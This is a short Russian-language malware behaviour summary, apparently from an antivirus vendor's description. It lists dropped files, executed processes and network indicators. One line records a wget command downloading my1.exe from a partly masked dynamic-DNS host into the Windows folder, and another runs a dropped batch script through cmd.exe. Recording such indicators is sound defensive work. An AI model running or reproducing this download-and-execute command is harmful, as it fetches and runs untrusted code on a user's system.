Техническая информация
- %WINDIR%\my1.exe
- %TEMP%\1.tmp\wget.exe "http://ll####.hopto.org/my1.exe" --output-document="%WINDIR%\my1.exe"
- %WINDIR%\my1.exe (загружен из сети Интернет)
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\rupdate.bat" "
- %WINDIR%\my1.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\rupdate.bat
- %TEMP%\1.tmp\rupdate.bat
- %TEMP%\1.tmp\wget.exe
- 'll####.hopto.org':80
- ll####.hopto.org/my1.exe
- DNS ASK ll####.hopto.org